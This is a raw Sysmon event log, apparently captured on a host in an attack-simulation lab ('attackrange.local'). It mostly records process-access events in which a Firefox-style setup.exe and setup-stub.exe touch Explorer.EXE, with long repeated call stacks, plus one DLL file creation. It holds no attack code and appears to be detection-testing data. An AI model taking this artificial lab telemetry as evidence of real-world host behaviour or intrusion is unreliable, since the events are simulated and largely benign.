13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 11241100x800000000000000015209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\osclientcerts.dll2021-01-18 13:59:52.489 10341000x800000000000000015208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 